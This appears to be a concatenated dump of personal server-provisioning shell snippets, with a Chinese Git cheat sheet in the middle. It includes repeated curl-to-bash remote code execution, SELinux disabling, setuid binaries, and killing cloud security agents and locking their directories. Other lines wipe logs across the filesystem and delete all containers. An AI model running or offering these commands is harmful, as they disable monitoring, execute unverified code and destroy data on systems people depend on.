[ -e /etc/selinux/config ]&&grep -q "SELINUX=enforcing" /etc/selinux/config&&sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/configclose chattr +ai /etc/passwd /etc/shadow /etc/group /etc/gshadow /etc/servicesf salt \* saltutil.refresh_pillarip IP=${SSH_CONNECTION% *};IP=${IP##* };[ -n "$IP" ]||IP=$(ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\.|^100\./'|head -1);echo $IPg salt \* saltutil.sync_grainsy ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|grep -E '^10\.|^100\.|^172\.1[6-9]\.|^172\.2[0-9]\.|^172\.3[0-1]\.|^192\.168\.'|head -1dep curl https://raw.githubusercontent.com/golang/dep/master/install.sh|bashtcp netstat -n|awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'open chattr -ai /etc/passwd /etc/shadow /etc/group /etc/gshadow /etc/servicesr echo doing...
curl -s xabc.io/b|bash
curl -s xabc.io/e|bash
curl -s xabc.io/v|bash
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
wget -t 3 https://s.xabcstack.com/src/redis.tgz -O -|tar xzf - -C /tmp
mv /tmp/redis/files/redis-$OS /opt/redis
rm -rf /tmp/redis/
mkdir -p /opt/redis/conf
wget -t 3 https://s.xabcstack.com/files/redis.conf -O /opt/redis/conf/redis.conf
chmod 100 /opt/redis/bin/*
pgrep redis||/opt/redis/bin/redis-server /opt/redis/conf/redis.conf
ps aux|grep redisto tail -f access.log|awk '$2 > 2 {print $0}'uninstall cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ]
then yum -y erase
fi
if [ "$OS" = "Debian" ]
then echo hello
fierr tail -f access.log|awk '$1 > 399 {print $0}'pycurl mkdir -p /tmp/build&&cd /tmp/build
wget -t 3 https://s.xabcstack.com/files/curl-7.43.0.tar.gz -O -|tar xzf -
cd curl-7.43.0
./configure
make && make install
mv /usr/lib64/libcurl.so.4* /tmp/
ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4.3.0
ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4
pip3 install pycurlos cat /etc/issue* /etc/*releaserunner yum install git -y
#curl -L --output /usr/local/bin/gitlab-runner https://gitlab-runner-downloads.s3.amazonaws.com/latest/binaries/gitlab-runner-linux-amd64
#chmod +x /usr/local/bin/gitlab-runner
#gitlab-runner install --user=root --working-directory=/root
#gitlab-runner start
#gitlab-runner registersredis BUILD=/tmp/ywgx
[ -d $BUILD ]||mkdir -p $BUILD
cd $BUILD
wget -t 3 http://download.redis.io/redis-stable.tar.gz -O -|tar xfz -
cd redis*/
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ]
CC=clang make
fi
if [ "$OS" = "Debian" ]
CC=clang make MALLOC=libc
fi
#cd src/
#for i in `find . -perm -0755 -a ! -type d`;do mv $i $REDIS_BIN/;donegit git clone https://gitlab.glority.cn/operation/matrix-build.git ./build (clone 到指定目录)
整理的常用 Git 命令清单。几个专用名词的译名如下。
Workspace:工作区
Index / Stage:暂存区
Repository:仓库区(或本地仓库)
Remote:远程仓库
一、新建代码库
在当前目录新建一个Git代码库 $ git init
新建一个目录,将其初始化为Git代码库 $ git init [project-name]
下载一个项目和它的整个代码历史 $ git clone [url]
二、配置
Git的设置文件为.gitconfig,它可以在用户主目录下(全局配置),也可以在项目目录下(项目配置)。
#显示当前的Git配置 $ git config --list
#编辑Git配置文件 $ git config -e [–global]
#设置提交代码时的用户信息 $ git config [–global] user.name “[name]”
$ git config [–global] user.email “[email address]”
三、增加/删除文件
#添加指定文件到暂存区 $ git add [file1] [file2] …
#添加指定目录到暂存区,包括子目录 $ git add [dir]
#添加当前目录的所有文件到暂存区 $ git add .
#添加每个变化前,都会要求确认 # 对于同一个文件的多处变化,可以实现分次提交 $ git add -p
#删除工作区文件,并且将这次删除放入暂存区 $ git rm [file1] [file2] …
#停止追踪指定文件,但该文件会保留在工作区 $ git rm --cached [file]
#改名文件,并且将这个改名放入暂存区 $ git mv [file-original] [file-renamed]
四、代码提交
#提交暂存区到仓库区 $ git commit -m [message]
#提交暂存区的指定文件到仓库区 $ git commit [file1] [file2] … -m [message]
#提交工作区自上次commit之后的变化,直接到仓库区 $ git commit -a
#提交时显示所有diff信息 $ git commit -v
#使用一次新的commit,替代上一次提交 # 如果代码没有任何新变化,则用来改写上一次commit的提交信息 $ git commit --amend -m [message]
#重做上一次commit,并包括指定文件的新变化 $ git commit --amend [file1] [file2] …
五、分支
#列出所有本地分支 $ git branch
#列出所有远程分支 $ git branch -r
#列出所有本地分支和远程分支 $ git branch -a
#新建一个分支,但依然停留在当前分支 $ git branch [branch-name]
#新建一个分支,并切换到该分支 $ git checkout -b [branch]
#新建一个分支,指向指定commit $ git branch [branch] [commit]
#新建一个分支,与指定的远程分支建立追踪关系 $ git branch --track [branch] [remote-branch]
#切换到指定分支,并更新工作区 $ git checkout [branch-name]
#切换到上一个分支 $ git checkout -
#建立追踪关系,在现有分支与指定的远程分支之间 $ git branch --set-upstream [branch] [remote-branch]
#合并指定分支到当前分支 $ git merge [branch]
#选择一个commit,合并进当前分支 $ git cherry-pick [commit]
#删除分支 $ git branch -d [branch-name]
#删除远程分支 $ git push origin --delete [branch-name]
$ git branch -dr [remote/branch]
六、标签
#列出所有tag $ git tag
#新建一个tag在当前commit $ git tag [tag]
#新建一个tag在指定commit $ git tag [tag] [commit]
#删除本地tag $ git tag -d [tag]
#删除远程tag $ git push origin :refs/tags/[tagName]
#查看tag信息 $ git show [tag]
#提交指定tag $ git push [remote] [tag]
#提交所有tag $ git push [remote] --tags
#新建一个分支,指向某个tag $ git checkout -b [branch] [tag]
git tag -a 2020-07-08 -m '2020-07-08'
git push 2020-07-08
七、查看信息
#显示有变更的文件 $ git status
#显示当前分支的版本历史 $ git log
#显示commit历史,以及每次commit发生变更的文件 $ git log --stat
#搜索提交历史,根据关键词 $ git log -S [keyword]
#显示某个commit之后的所有变动,每个commit占据一行 $ git log [tag] HEAD --pretty=format:%s
#显示某个commit之后的所有变动,其"提交说明"必须符合搜索条件 $ git log [tag] HEAD --grep feature
#显示某个文件的版本历史,包括文件改名 $ git log --follow [file]
$ git whatchanged [file]
#显示指定文件相关的每一次diff $ git log -p [file]
#显示过去5次提交 $ git log -5 --pretty --oneline
#显示所有提交过的用户,按提交次数排序 $ git shortlog -sn
#显示指定文件是什么人在什么时间修改过 $ git blame [file]
#显示暂存区和工作区的差异 $ git diff
#显示暂存区和上一个commit的差异 $ git diff --cached [file]
#显示工作区与当前分支最新commit之间的差异 $ git diff HEAD
#显示两次提交之间的差异 $ git diff [first-branch]…[second-branch]
#显示今天你写了多少行代码 $ git diff --shortstat “@{0 day ago}”
#显示某次提交的元数据和内容变化 $ git show [commit]
#显示某次提交发生变化的文件 $ git show --name-only [commit]
#显示某次提交时,某个文件的内容 $ git show [commit]:[filename]
#显示当前分支的最近几次提交 $ git reflog
八、远程同步
#下载远程仓库的所有变动 $ git fetch [remote]
#显示所有远程仓库 $ git remote -v
#显示某个远程仓库的信息 $ git remote show [remote]
#增加一个新的远程仓库,并命名 $ git remote add [shortname] [url]
#取回远程仓库的变化,并与本地分支合并 $ git pull [remote] [branch]
#上传本地指定分支到远程仓库 $ git push [remote] [branch]
#强行推送当前分支到远程仓库,即使有冲突 $ git push [remote] --force
#推送所有分支到远程仓库 $ git push [remote] --all
九、撤销
#恢复暂存区的指定文件到工作区 $ git checkout [file]
#恢复某个commit的指定文件到暂存区和工作区 $ git checkout [commit] [file]
#恢复暂存区的所有文件到工作区 $ git checkout .
#重置暂存区的指定文件,与上一次commit保持一致,但工作区不变 $ git reset [file]
#重置暂存区与工作区,与上一次commit保持一致 $ git reset --hard
#重置当前分支的指针为指定commit,同时重置暂存区,但工作区不变 $ git reset [commit]
#重置当前分支的HEAD为指定commit,同时重置暂存区和工作区,与指定commit一致 $ git reset --hard [commit]
#重置当前HEAD为指定commit,但保持暂存区和工作区不变 $ git reset --keep [commit]
#新建一个commit,用来撤销指定commit # 后者的所有变化都将被前者抵消,并且应用到当前分支 $ git revert [commit]
#暂时将未提交的变化移除,稍后再移入 $ git stash
$ git stash pop
十、其他
#查看远程分支和本地分支的对应关系 $git remote show origin
#从本地删除远程已经删除的分支的tracking(在issue被merge之后,远程分支会被删除,那么相应的本地tracking我们也可以删除掉) $git remote prune origin
#从本地删除远程已经删除的分支(merge后可以执行此操作保持工作区的清洁) $git fetch -p && for branch in `git branch -vv | grep ': gone]' | awk '{print $1}'`; do git branch -D $branch; done
#生成一个可供发布的压缩包 $ git archive
mac #scutil --set ComputerName "E"
#scutil --set LocalHostName "E"
#scutil --set HostName "E"
#nvram AutoBoot=%00 关闭开盖启动
#nvram AutoBoot=%03 恢复开盖启动
#sudo defaults write /Library/Preferences/com.apple.loginwindow SHOWOTHERUSERS_MANAGED -bool FALSE 删除开机界面上的 “其他”用户登陆选项
#pwpolicy -clearaccountpolicies 运行后,可以设置2位密码aliyunexporter pip3 install aliyun-exporter
pip3 uninstall werkzeug
pip3 install PyYAML -U
pip3 install werkzeug==0.16.1kubectl # kubectl edit deployment filelist -n htdz 查看deployment 中 filelist 的模版
#curl -LO https://dl.k8s.io/release/v1.21.0/bin/linux/amd64/kubectl
#curl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl
wget -t 3 https://s.xabcstack.com/k8s/kubectl -O /usr/local/bin/kubectl
chmod +x /usr/local/bin/kubectlfilelist0 yum update -y
pip3 install bson markdown pyaml pyyaml numpy pymongo redis uvloop tornado markdown apscheduler psutil requests orderedset tqdm aredis aiomysql motor bs4 lxml requests_toolbelt aio_pika pika selenium aiosmtplibtf wget -t 3 https://s.xabcstack.com/terraform/terraform -O /usr/local/bin/terraform
chmod +x /usr/local/bin/terraform
/usr/local/bin/terraform -install-autocompletefilelist2 cd ~
[ -d /home/ywgx/0 ]||mkdir -p /home/ywgx/0
[ -d /home/ywgx/1 ]||mkdir -p /home/ywgx/1
[ -d /home/ywgx/2 ]||mkdir -p /home/ywgx/2
[ -d /home/ywgx/logs ]||mkdir -p /home/ywgx/logs
[ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist
wget -t 3 https://s.xabcstack.com/ywgx/0/openresty.tgz -O -|tar xzf - -C /home/ywgx/0
wget -t 3 https://s.xabcstack.com/ywgx/0/nginx.conf -O /home/ywgx/0/openresty/nginx/conf/nginx.conf
[ -d /home/ywgx/0/openresty/nginx/conf/ssl ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/ssl
wget -t 3 https://s.xabcstack.com/ywgx/0/filelist.cn.pem -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.pem
wget -t 3 https://s.xabcstack.com/ywgx/0/filelist.cn.key -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.key
[ -d /home/ywgx/0/openresty/nginx/conf/vhost ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/vhost
wget -t 3 https://s.xabcstack.com/ywgx/0/filelist.cn.conf -O /home/ywgx/0/openresty/nginx/conf/vhost/filelist.cn.conf
wget -t 3 https://s.xabcstack.com/filelist/filelist-bin.tgz -O -|tar xzf - -C /home/ywgx/1
wget -t 3 https://s.xabcstack.com/ywgx/2/redis.tgz -O -|tar xzf - -C /home/ywgx/2
wget -t 3 https://s.xabcstack.com/ywgx/2/mongo.tgz -O -|tar xzf - -C /home/ywgx/2
pgrep redis||~/2/redis/bin/redis-server ~/2/redis/conf/redis.conf
pgrep mongod||~/2/mongo/bin/mongod -f ~/2/mongo/conf/mongod.conf
curl xabc.io/rb|bash
echo "chown root.nobody /home/ywgx/0/openresty/nginx/sbin/nginx;chmod +xs /home/ywgx/0/openresty/nginx/sbin/nginx"i0 if [ $USER = ywgx ];then
[ -d /home/ywgx/0 ]||mkdir -p /home/ywgx/0
[ -d /home/ywgx/1 ]||mkdir -p /home/ywgx/1
[ -d /home/ywgx/2 ]||mkdir -p /home/ywgx/2
[ -d /home/ywgx/logs ]||mkdir -p /home/ywgx/logs
[ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist
wget -t 3 https://s.xabcstack.com/ywgx/0/openresty.tgz -O -|tar xzf - -C /home/ywgx/0
wget -t 3 https://s.xabcstack.com/ywgx/0/nginx.conf -O /home/ywgx/0/openresty/nginx/conf/nginx.conf
[ -d /home/ywgx/0/openresty/nginx/conf/ssl ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/ssl
wget -t 3 https://s.xabcstack.com/ywgx/0/filelist.cn.pem -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.pem
wget -t 3 https://s.xabcstack.com/ywgx/0/filelist.cn.key -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.key
[ -d /home/ywgx/0/openresty/nginx/conf/vhost ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/vhost
chmod +xs /home/ywgx/0/openresty/nginx/sbin/nginx
pgrep nginx||~/0/openresty/nginx/sbin/nginx
fii1 if [ $USER = ywgx ];then
[ -d /home/ywgx/1 ]||mkdir -p /home/ywgx/1
[ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist
wget -t 3 https://s.xabcstack.com/filelist/filelist-bin.tgz -O -|tar xzf - -C /home/ywgx/1
fii2 if [ $USER = ywgx ];then
[ -d /home/ywgx/2 ]||mkdir -p /home/ywgx/2
[ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist
wget -t 3 https://s.xabcstack.com/ywgx/2/redis.tgz -O -|tar xzf - -C /home/ywgx/2
wget -t 3 https://s.xabcstack.com/ywgx/2/mongo.tgz -O -|tar xzf - -C /home/ywgx/2
fih cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
CPU=`cat /proc/cpuinfo|grep "processor"|wc -l`
MEM=`free|awk '/Mem/ {print int(($2+1048576)/1048576)}'`
echo "$OS $CPU $MEM"ssh mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bk
wget -t 3 https://s.xabcstack.com/files/sshd_config -O /etc/ssh/sshd_config
systemctl restart sshd.servicedebug salt-minion -l debug
chrony cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y install epel-release
yum -y install chrony
systemctl enable chrony
fi
if [ "$OS" = "Debian" ];then
apt-get -y install chrony
chkconfig --add chronyd
fi
timedatectl set-timezone Asia/Shanghaibusybox [ -d /usr/local/bin ]||mkdir -p /usr/local/bin
wget -t 3 https://s.xabcstack.com/files/busybox -O /usr/local/bin/busybox
chmod +x /usr/local/bin/busyboxphp cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
yum -y install php72w
yum -y install php72w-cli php72w-common php72w-devel php72w-mysql php72w-fpm
yum -y install php72w-gd php72w-imap php72w-ldap php72w-odbc php72w-pear php72w-xml php72w-xmlrpc php72w-mbstring php72w-pdo
fi
if [ "$OS" = "Debian" ];then
apt-get -y install php7.[0-9]
apt-get -y install php7.[0-9]-mysql php7.[0-9]-fpm
apt-get -y install php7.[0-9]-gd php7.[0-9]-mbstring php7.[0-9]-xmlrpc
fib cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ]
then yum -y install vim wget bzip2 unzip rsync psmisc net-tools bind-utils telnet bash-completion
fi
if [ "$OS" = "Debian" ]
then apt-get -y install vim wget bzip2 unzip rsync psmisc net-tools dnsutils telnet
fiuuid cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y install libuuid-devel
fi
if [ "$OS" = "Debian" ];then
apt-get -y install uuid-dev
fitools cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ]
then yum -y install vim wget bzip2 unzip rsync bash-completion git tmux inotify-tools axel jq
fi
if [ "$OS" = "Debian" ]
then apt-get -y insall vim wget bzip2 unzip rsync git tmux inotify-tools luajit jq
fibase cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y install epel-release
yum -y install bash-completion
yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl bzip2-devel clang
yum -q -y install vim wget curl zip bzip2 unzip rsync psmisc net-tools bind-utils telnet openssh-clients pcre openssl
fi
if [ "$OS" = "Debian" ];then
apt-get -y update
apt-get -y install libreadline-dev libpcre3-dev libssl-dev cmake perl libncurses5-dev build-essential clang
apt-get -q -y install vim wget curl zip bzip2 unzip rsync psmisc net-tools dnsutils telnet
ficall pip3 install aliyun-python-sdk-core
pip3 install aliyun-python-sdk-dyvmsapi
file curl https://s.xabcstack.com/filelist/filelist.sh -o /etc/profile.d/filelist.sh
yum install axel wget
pip3 install rsa
pip3 install Crypto
pip3 install pycryptov wget -t 3 https://s.xabcstack.com/ywgx/vim.tgz -O -|tar xzf - -C ~python3 yum install -y python3-devel libcurl-develistio echo doing...
wget -t 3 https://s.xabcstack.com/istio/istio.tgz -O -|tar xzf - -C /opt
wget -t 3 https://s.xabcstack.com/istio/xabc-istio.sh -O /etc/profile.d/xabc-istio.sh
echo /opt/istiomysql cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
wget -t 3 https://s.xabcstack.com/files/MariaDB.repo -O /etc/yum.repos.d/MariaDB.repo
yum -y install mariadb mariadb-server
systemctl start mariadb
systemctl enable mariadb
mysql_secure_installation
fi
if [ "$OS" = "Debian" ];then
apt-get -y install mysql-server
fiq echo doing...
find / -empty -mtime +7 ! -path "/proc/*" -a ! -path "/sys/*" -a ! -path "/etc/*" ! -path "/boot/*" -type f -a -name "*.log" -delete
for i in $(find `du -s /* --exclude={proc,etc,sys,boot,run,mnt}|sort -nr|head -7|awk '{print $2}'|tr '\n' ' '` -type f -a -name "*.log" ! -name ".xabc.log" ! -name ".usercmd.log" ! -name "usercmd.log" ! -name ".sys.log" -o -name "catalina.out");do echo $i;> $i;donepy3b if ! type python3 &>/dev/null;then
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
if [ ! -d "/usr/local/lib/python3.8" ];then
echo doing...
wget -t 3 https://s.xabcstack.com/files/lib-python3.8.tgz -O -|tar xzf - -C /usr/local/lib
wget -t 3 https://s.xabcstack.com/files/include-python3.8.tgz -O -|tar xzf - -C /usr/local/include
wget -t 3 https://s.xabcstack.com/files/pip3.8 -O /usr/local/bin/pip3.8
wget -t 3 https://s.xabcstack.com/files/python3.8 -O /usr/local/bin/python3.8
chmod +x /usr/local/bin/pip3.8 /usr/local/bin/python3.8
ln -s /usr/local/bin/python3.8 /usr/local/bin/python3
source /etc/profile
echo "done"
fi
fi
fipy3 cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl
yum -y install zlib-devel libffi-devel openssl-devel
fi
if [ "$OS" = "Debian" ];then
apt -y install libreadline-dev libpcre3-dev libssl-dev cmake perl libncurses5-dev build-essential
apt -y install zlib1g-dev libffi-devel libssl-dev
fi
#PYTHON_VER=3.8.3
PYTHON_VER=3.9.2
mkdir -p /tmp/build&&cd /tmp/build
wget -t 3 https://s.xabcstack.com/python/Python-$PYTHON_VER.tgz -O -|tar xzf -
cd Python-$PYTHON_VER
#./configure --enable-optimizations
./configure
make && make install
pip3 install bson markdown pyaml pyyaml numpy pymongo redis uvloop
pip3 install aiosmtplib
pip3 install tornado
rm -fr /tmp/buildn hostnamectl --static set-hostnameawscli #https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip
rm -rf /tmp/aws
yum install -y unzip
curl https://s.xabcstack.com/aws/awscli-exe-linux-x86_64.zip -o /tmp/awscli-exe-linux-x86_64.zip
unzip -q /tmp/awscli-exe-linux-x86_64.zip -d /tmp/
/tmp/aws/install -i ~/.local/aws-cli -b ~/.local/bininfluxdb echo doing...
curl -s xabc.io/b|bash
curl -s xabc.io/e|bash
curl -s xabc.io/v|bash
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
INFLUXDB_VER=1.7.8
if [ "$OS" = "RedHat" ]
then
yum -y install yum-utils
yum -y localinstall https://s.xabcstack.com/files/influxdb-${INFLUXDB_VER}.x86_64.rpm
wget -t 3 https://s.xabcstack.com/file/influxdb.repo -O /etc/yum.repos.d/influxdb.repo
fi
if [ "$OS" = "Debian" ]
then
wget -t 3 https://s.xabcstack.com/files/influxdb_${INFLUXDB_VER}_amd64.deb
dpkg -i influxdb_${INFLUXDB_VER}_amd64.deb
rm -f influxdb_${INFLUXDB_VER}_amd64.deb
fio echo doing...
curl -s xabc.io/b|bash
curl -s xabc.io/e|bash
curl -s xabc.io/v|bash
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
wget -t 3 https://s.xabcstack.com/files/openresty-$OS.tgz -O -|tar xzf - -C /opt
wget -t 3 https://s.xabcstack.com/files/nginx.conf -O /opt/openresty/nginx/conf/nginx.conf
mkdir -p /opt/openresty/nginx/conf/ssl
chattr -ai /etc/passwd /etc/shadow /etc/group /etc/gshadow
id -u nobody &>/dev/null||useradd nobody -r -s /bin/false
groupadd -f nobody &>/dev/null
chown root.nobody /opt/openresty/nginx/sbin/nginx
if [ "$OS" = "RedHat" ]
then
grep -q nginx /etc/rc.d/rc.local||echo "/opt/openresty/nginx/sbin/nginx" >> /etc/rc.d/rc.local;chmod 755 /etc/rc.d/rc.local
fi
if [ "$OS" = "Debian" ]
then
grep -q nginx /etc/rc.local||echo "/opt/openresty/nginx/sbin/nginx" >> /etc/rc.local;chmod 755 /etc/rc.local
fi
chmod +xs /opt/openresty/nginx/sbin/nginx
echo "/opt/openresty"runc #runc-rc94
curl https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/runc -o /tmp/runc
if md5sum /tmp/runc | grep -q 3d446892e4d6a0644188363c9746fed4;then mv /usr/bin/runc /usr/bin/runc.bak && mv /tmp/runc /usr/bin/runc && chmod +x /usr/bin/runc && echo ok || echo fails;fij echo doing...
curl -s xabc.io/b|bash
curl -s xabc.io/e|bash
curl -s xabc.io/v|bash
wget -t 3 https://s.xabcstack.com/src/java.tgz -O -|tar xzf - -C /tmp
tar xzf /tmp/java/files/jdk.tgz -C /opt
tar xzf /tmp/java/files/tomcat.tgz -C /opt
mv /tmp/java/files/*.sh /etc/profile.d/
rm -rf /tmp/java/
echo "/opt/{jdk,tomcat}"k8s [ -d /etc/modules-load.d ]||mkdir -p /etc/modules-load.d
[ -d /etc/sysctl.d ]||mkdir -p /etc/sysctl.d
wget -t 3 https://s.xabcstack.com/k8s/etc_modules-load.d_k8s.conf -O /etc/modules-load.d/k8s.conf
wget -t 3 https://s.xabcstack.com/k8s/etc_sysctl.d_k8s.conf -O /etc/sysctl.d/k8s.conf
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
cat <e wget -q https://s.xabcstack.com/ywgx/ywgx.sh -O /etc/profile.d/ywgx.sh;chmod 644 /etc/profile.d/ywgx.shacme ./acme.sh --issue --dns dns_ali --dnssleep 30 -d $1 -d *.$1
./acme.sh --issue --dns dns_dp --dnssleep 30 -d $1 -d *.$1ssl proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header X-NginX-Proxy true;
proxy_set_header Connection "";
log_format main "$status $request_time $request_method $host$request_uri [$http_user_agent] [$time_local] [$http_x_forwarded_for $remote_addr] $http_referer";
access_log logs/access.log main;
ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4:!DH:!DHE;
ssl_protocols TLSv1.1 TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers on;
upstream EX{
keepalive 64;
server 127.0.0.1:7001;
}
server{
listen 80;
listen 443 ssl http2;
server_name EX;
ssl_certificate ssl/EX.pem;
ssl_certificate_key ssl/EX.key;
location /{
proxy_pass http://EX;
}
}di docker exec -it `docker ps|grep -v IMAGE|head -n 1|awk '{print $1}'` /bin/shm yum -y install wget
yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm
yum -y install salt-minion
systemctl enable salt-minion.serviceds #停止所有容器
docker stop $(docker ps -aq) 2>/dev/null
docker rm $(docker ps -aq) 2>/dev/nullsk echo $(cat ./config | base64) |tr -d " "|openssl aes-256-cbc -salt -pbkdf2 -k $SALT > secret_kubeconfigdd #删除所有镜像
docker stop $(docker ps -aq) 2>/dev/null
docker rm $(docker ps -aq) 2>/dev/null
docker rmi -f $(docker images -q) 2>/dev/nullk chattr -ai -R /usr/local/{aegis,qcloud,cloudmonitor} &>/dev/null
rm -rf /etc/motd &>/dev/null
rm -fr /usr/local/{aegis,qcloud,cloudmonitor} &>/dev/null
rm -rf /lib/systemd/system/aliyun.service &>/dev/null
mkdir /usr/local/{aegis,cloudmonitor,qcloud}
killall -9 sgagent &>/dev/null
killall -9 barad_agent &>/dev/null
killall -9 aliyun_assist_update &>/dev/null
killall -9 aliyun_assist_update &>/dev/null
killall -9 AliSecureCheckAdvanced &>/dev/null
killall -9 CmsGoAgent.linux-amd64 &>/dev/null
kill -9 `pidof YDLive` &>/dev/null
kill -9 `pidof YDService` &>/dev/null
kill -9 `pidof wrapper` &>/dev/null
kill -9 `pidof AliYunDun` &>/dev/null
kill -9 `pidof AliYunDunUpdate` &>/dev/null
chattr +ai /usr/local/{aegis,cloudmonitor,qcloud}dlload which docker &>/dev/null||curl -s xabc.io/docker|bash
docker run -d -p 80:8000 --restart=always --name=filelist -v /opt/data/files:/opt/files ywgx/filelistfilelist1 chattr -ai /etc/passwd /etc/shadow /etc/group /etc/gshadow
useradd ywgx
id -u nobody &>/dev/null||useradd nobody -r -s /bin/false
id -u nobody &>/dev/null||useradd nobody -r -s /bin/false
[ -e /etc/profile.d/ywgx.sh ]||wget -t 3 https://s.xabcstack.com/ywgx/ywgx.sh -O /etc/profile.d/ywgx.sh
[ -e /etc/profile.d/filelist.sh ]||wget -t 3 https://s.xabcstack.com/filelist/filelist.sh -O /etc/profile.d/filelist.sh
curl -s xabc.io/b|bash
curl -s xabc.io/py3b|bash
wget -q https://s.xabcstack.com/files/lib-libcurl.tgz -O -|tar xzf - -C /usr/local/lib
ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4.3.0
ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4filelist which docker &>/dev/null||curl -s xabc.io/docker|bash
curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/docker-compose.yml -O
